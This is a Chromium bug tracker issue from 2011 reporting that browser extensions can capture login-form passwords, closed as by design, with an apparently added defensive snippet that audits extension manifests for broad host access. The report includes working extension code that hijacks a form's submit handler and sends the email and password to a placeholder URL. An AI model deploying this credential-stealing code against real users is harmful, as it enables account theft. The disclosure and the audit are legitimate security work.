
Issue 78783


Issue metadata

Status: Invalid
Owner: ----
Closed: Feb 2013
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 2
Type: ----


Ability to create built-in keylogger as addon

Reported by mic...@gmail.com, Apr 8 2011

Issue description

VULNERABILITY DETAILS
Any extension is able to bind/change onsubmit event on any form and by 
XMLHttpRequest send data to other domain.

It can happen e.g. to a Facebook account. In my opinion, fields with type set to password should be viewable from Chrome JavaScript events.
Example in reproduction case.

VERSION
Chrome Version: any
Operating System: any

REPRODUCTION CASE
It's enough to put this:
<code>

function removeOnSubmit()
{
//return Event.__inlineSubmit(this,event)
	var myformk = document.getElementById('login_form');
	myformk.removeAttribute('onsubmit');
	document.getElementById('login_form').onsubmit = alert;
}
removeOnSubmit();
document.getElementById('login_form').onsubmit = doAction;

function doAction() 
{
	var mydomain=window.location.hostname;
	var dane = mydomain+':'+document.getElementById('email').value+':'+document.getElementById('pass').value;
	chrome.extension.sendRequest({'action' : dane}, onText);
}
</code>
and:
<code>
<!DOCTYPE html>
<!--
 * Copyright (c) 2010 The Chromium Authors. All rights reserved.  Use of this
 * source code is governed by a BSD-style license that can be found in the
 * LICENSE file.
-->
<html>
  <head>
  </head>
  <body>
    <script>
      /**
       * Performs an XMLHttpRequest to Twitter's API to get trending topics.
       * @param callback Function If the response from fetching url has a
       *     HTTP status of 200, this function is called with a JSON decoded
       *     response.  Otherwise, this function is called with null.
       */
      function fetchTwitterFeed(callback, data) {
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function(data) {
          if (xhr.readyState == 4) {
            if (xhr.status == 200) {
              var data = JSON.parse(xhr.responseText);
              callback(null);
            } else {
              callback(null);
            }
          }
        }
        // Note that any URL fetched here must be matched by a permission in
        // the manifest.json file!
        var url = 'http://someurltosenddata?data='+data;
        xhr.open('GET', url, true);
        xhr.send();
      };

      /**
       * Handles data sent via chrome.extension.sendRequest().
       * @param request Object Data sent in the request.
       * @param sender Object Origin of the request.
       * @param callback Function The method to call when the request completes.
       */
      function onRequest(request, sender, callback) {
        // Only supports the 'fetchTwitterFeed' method, although this could be
        // generalized into a more robust RPC system.
        
          fetchTwitterFeed(callback, request.action);
        
      };

      // Wire up the listener.
      chrome.extension.onRequest.addListener(onRequest);
    </script>
  </body>
</html>
</code>

in one of your extensions samples: http://code.google.com/chrome/extensions/samples.html#6871d09f4a96bf9d4b6cc724d00e909cee0f3902

to create a perfect, invisible password thief. In fact the user needs to click only 2 things: to download this extension and then to accept it. Many people do it in effect - they accept many things.

Hope you will change attitude to this.
Yours,
Michal Kulesza

Comment 1 by mic...@gmail.com, Apr 8 2011

should NOT be viewable* for sure
Labels: -Restrict-View-SecurityTeam -Type-Security -Pri-0 Pri-2
Status: Invalid
This is by design: if a user installs an extension that requests access to a website, that extension has access to all information on that website, including anything you type in forms.

We cannot have legitimate extensions without this, and we cannot check if an extension is malicious or not. Users will have to check if an extension is trustworthy before installing it - adding more warnings and popups will not fix user indifference. This is the same when you download and run any application.
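As an added, defender-side illustration of the point made in the reply above (this is not code from the Chromium issue or from the extension sample it quotes): the one thing a user or reviewer can check before installing is what the manifest asks for, since a content script can only read a login form on an origin its match patterns cover, and the comment in the sample notes that any URL fetched must also be matched by a manifest permission. The snippet below parses Chrome's match-pattern syntax (`<all_urls>`, `*://*/*`, `https://*.example.com/*`), flags patterns that grant access to every host, and reports which of a list of sensitive URLs each pattern would reach. The manifest and the sensitive URLs are constructed for the example; `auditManifest`, `matchPatternToRegExp` and `isBroadHostPattern` are names chosen here, not a Chrome API.

```javascript
// Added example: audit a Chrome extension manifest for host access that
// would let a content script see a page's forms. Not part of the issue.

// Chrome match pattern: <scheme>://<host><path>, where scheme may be "*"
// (http or https), host may be "*" or "*.domain", and path may contain "*".
const MATCH_PATTERN = /^(\*|https?|ftp|file|wss?):\/\/(\*|\*\.[^/*]+|[^/*]+)?(\/.*)$/;

function escapeRe(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Convert one match pattern into a RegExp; null if the pattern is malformed.
function matchPatternToRegExp(pattern) {
  if (pattern === '<all_urls>') return /^(https?|ftp|file|wss?):\/\/.*$/;
  const m = MATCH_PATTERN.exec(pattern);
  if (!m) return null;
  const [, scheme, host = '', path] = m;
  const schemeRe = scheme === '*' ? 'https?' : scheme;
  let hostRe;
  if (host === '*') hostRe = '[^/]+';                                   // any host
  else if (host.startsWith('*.')) hostRe = '([^/]+\\.)?' + escapeRe(host.slice(2)); // domain + subdomains
  else hostRe = escapeRe(host);                                          // exact host
  const pathRe = path.split('*').map(escapeRe).join('.*');
  return new RegExp('^' + schemeRe + '://' + hostRe + pathRe + '$');
}

// True for patterns that grant access to every host (on any scheme).
function isBroadHostPattern(pattern) {
  if (pattern === '<all_urls>') return true;
  const m = MATCH_PATTERN.exec(pattern);
  return m !== null && m[2] === '*';
}

// Collect every host pattern the manifest asks for: MV2 "permissions"
// entries that are URLs, MV3 "host_permissions", and content_scripts.matches.
function collectHostPatterns(manifest) {
  const out = [];
  for (const p of manifest.permissions || []) {
    if (p === '<all_urls>' || p.includes('://')) out.push(p);
  }
  for (const p of manifest.host_permissions || []) out.push(p);
  for (const cs of manifest.content_scripts || []) {
    for (const p of cs.matches || []) out.push(p);
  }
  return out;
}

// Report (a) patterns that reach every host and (b) for each sensitive URL,
// the patterns that would give the extension script access to that page.
function auditManifest(manifest, sensitiveUrls) {
  const patterns = collectHostPatterns(manifest);
  const broadHostAccess = patterns.filter(isBroadHostPattern);
  const reachable = {};
  for (const url of sensitiveUrls) {
    reachable[url] = patterns.filter((p) => {
      const re = matchPatternToRegExp(p);
      return re !== null && re.test(url);
    });
  }
  return { broadHostAccess, reachable };
}

// Constructed sample manifest (hypothetical; not the extension from the issue).
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: 'Constructed sample extension',
  permissions: ['tabs', 'http://*/*', 'https://*/*'],
  content_scripts: [{ matches: ['https://*.facebook.com/*'], js: ['content.js'] }],
};

// Constructed list of pages whose forms a user would not want an extension to read.
const SENSITIVE_URLS = ['https://www.facebook.com/login.php', 'https://mail.example.com/inbox'];

console.log(JSON.stringify(auditManifest(SAMPLE_MANIFEST, SENSITIVE_URLS), null, 2));
```

With the constructed manifest, the audit flags `http://*/*` and `https://*/*` as broad host access and shows that the Facebook login page is reachable both through the broad permission and through the narrower `https://*.facebook.com/*` content-script match, while the mail page is reachable only through the broad one. That is the check the reply leaves to the user: a manifest whose patterns cover a site is, by design, an extension that can read whatever is typed into that site's forms.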

Project Member

Comment 3 by bugdroid1@chromium.org, Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
Owner: ----
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member

Comment 4 by bugdroid1@chromium.org, Mar 11 2013

Labels: -Area-Undefined